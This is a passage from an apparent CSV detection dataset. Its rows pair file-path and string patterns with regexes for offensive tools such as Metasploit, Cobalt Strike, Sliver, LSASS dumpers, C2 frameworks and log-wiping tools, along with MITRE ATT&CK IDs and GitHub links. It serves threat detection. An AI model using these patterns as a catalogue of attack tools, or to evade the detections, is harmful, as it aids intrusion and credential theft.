in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/*SandboxEscapes/*",".{0,1000}\/.{0,1000}SandboxEscapes\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/../../../../../boot.ini*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/boot\.ini.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/.aggressor.prop*",".{0,1000}\/\.aggressor\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/.clone.dll*",".{0,1000}\/\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/.cme/cme.conf*",".{0,1000}\/\.cme\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/.dns2tcprc*",".{0,1000}\/\.dns2tcprc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/.exegol/*",".{0,1000}\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/.link/3rdparty/SharpCollection*",".{0,1000}\/\.link\/3rdparty\/SharpCollection.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*/.local/share/pacu/*",".{0,1000}\/\.local\/share\/pacu\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/.localxpose/.access*",".{0,1000}\/\.localxpose\/\.access.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/.manspider/logs*",".{0,1000}\/\.manspider\/logs.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/.manspider/loot*",".{0,1000}\/\.manspider\/loot.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/.MOONWALK*",".{0,1000}\/\.MOONWALK.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/.msf4/*",".{0,1000}\/\.msf4\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/.ntdissector*",".{0,1000}\/\.ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/.nxc/obfuscated_scripts/*",".{0,1000}\/\.nxc\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/.proxychains/*",".{0,1000}\/\.proxychains\/.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/.sliver/logs*",".{0,1000}\/\.sliver\/logs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/.sliver-client/*",".{0,1000}\/\.sliver\-client\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/.ssh/RAI.pub*",".{0,1000}\/\.ssh\/RAI\.pub.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*// A: the Meterpreter stage is a large shellcode *",".{0,1000}\/\/\sA\:\sthe\sMeterpreter\sstage\sis\sa\slarge\sshellcode\s.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*// Define IP Adress of your C2 Stager (!)*",".{0,1000}\/\/\sDefine\sIP\sAdress\sof\syour\sC2\sStager\s\(!\).{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*// Malicious payload should be implemented here*",".{0,1000}\/\/\sMalicious\spayload\sshould\sbe\simplemented\shere.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*//:ptth*",".{0,1000}\/\/\:ptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//:sptth""[::-1]*",".{0,1000}\/\/\:sptth\""\[\:\:\-1\].{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*//:sptth*",".{0,1000}\/\/\:sptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//Lh0St/InJ3C*",".{0,1000}\/\/Lh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*//localhost:1337*",".{0,1000}\/\/localhost\:1337.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*//RRh0St/InJ3C*",".{0,1000}\/\/RRh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*//shuck.sh*",".{0,1000}\/\/shuck\.sh.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*//StaticSyscallsDump/*",".{0,1000}\/\/StaticSyscallsDump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/_distutils_hack.zip*",".{0,1000}\/_distutils_hack\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/0d1n.c*",".{0,1000}\/0d1n\.c.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/0d1n_view*",".{0,1000}\/0d1n_view.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/0tt7/CVE-2022-23131*",".{0,1000}\/0tt7\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0004","N/A","N/A","Exploitation tools","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","1","16","9","2022-02-21T08:25:56Z","2022-02-21T00:51:14Z" "*/0xdarkvortex-*",".{0,1000}\/0xdarkvortex\-.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/0xIronGoat/dirty-pipe*",".{0,1000}\/0xIronGoat\/dirty\-pipe.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*/0xthirteen/*",".{0,1000}\/0xthirteen\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/0xthirteen/StayKit*",".{0,1000}\/0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/1$a$$.exe*",".{0,1000}\/1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/1/all_in_one.7z.torrent*",".{0,1000}\/1\/all_in_one\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/1/all_in_one_p.7z*",".{0,1000}\/1\/all_in_one_p\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/1/all_in_one_w.7z*",".{0,1000}\/1\/all_in_one_w\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/10m_usernames.txt*",".{0,1000}\/10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*/11_Credentials.py*",".{0,1000}\/11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/13_NoseyParker.py*",".{0,1000}\/13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/17_Custom_Cracklist.py*",".{0,1000}\/17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/1mxml/CVE-2022-23131*",".{0,1000}\/1mxml\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","2","0","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" "*/365-Stealer.git*",".{0,1000}\/365\-Stealer\.git.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*/3DESEncryptor.go*",".{0,1000}\/3DESEncryptor\.go.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/3snake.git*",".{0,1000}\/3snake\.git.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/4luc4rdr5290/CVE-2022-0847*",".{0,1000}\/4luc4rdr5290\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 